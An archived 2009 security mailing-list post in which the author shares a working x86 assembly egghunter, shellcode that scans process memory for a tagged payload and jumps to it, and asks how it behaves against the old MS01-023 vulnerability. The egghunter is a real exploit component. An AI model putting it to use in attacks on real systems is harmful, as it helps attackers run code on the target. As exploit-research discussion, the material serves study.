Dailydave mailing list archives

Previous By Date Next
Previous By Thread Next

Merry Xmas & Happy "Search Memory for you Shellcode"...

From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:16:08 -0200
Hey, fellows.

I am get some spare time to work with a well-known technique called "egghunt",
based on skape excellent article "Safely Searching Process Virtual Address
Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf).

But while trying to perform this technique on a really old vulnerability
(MS01-023) the egghunt doesn't work as good as I was expecting.

The code:
win32_syscall_forward_01 PROC
        start:
                xor             edx, edx                ; zeroing the edx, it is
necessary to avoid BO in 'Release'
        inc_page:
                or              dx, 0FFFh               ; add PAGE_SIZE-1 to edx
        inc_byte:
                inc             edx                     ; increment our pointer
by one
        setup_syscall:
                push    edx                             ; save edx on the stack
                push    +02h                            ; push
NtAccessCheckAndAuditAlarm
                pop             eax                     ; pop into eax
                int             2Eh                     ; perform the syscall
(KiSystemService())
                cmp             al, 05h         ; did we get 0xc0000005
(STATUS_ACCESS_VIOLATION)?
                pop             edx                     ; restore edx
                je              inc_page                ; yes, invalid pointer,
go to the next page
        setup_badge:
                mov             eax, "NBNB"             ; throw our badge in eax
        check_badge:
                mov             edi, edx                ; set edi to the pointer
we validated
                scasd                                   ; compare the dword in
edi to eax
                jnz             inc_byte                ; no match? increment
the pointer by one
                scasd                                   ; compare the dword in
edi to eax again - which is now eax + 3
                jnz             inc_byte                ; no match? increment
the pointer by one
        badge_found:
                jmp             edi                     ; found the badge, jump
8 bytes past it into our code
win32_syscall_forward_01 ENDP

Well, I called this "forward" because it will try to find the code from "the
place" BO happens to the end of STACK. Am I right?

But in this vulnerability the stager shellcode will be placed in somewhere on
the BUTTOM of the STACK, right?

/*
 * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $
 *
 * Author: Nelson Brito <nbrito [at] sekure [dot] org> 
 
   Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide.
   http://fnstenv.blogspot.com */


_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
Previous By Date Next
Previous By Thread Next

Current thread: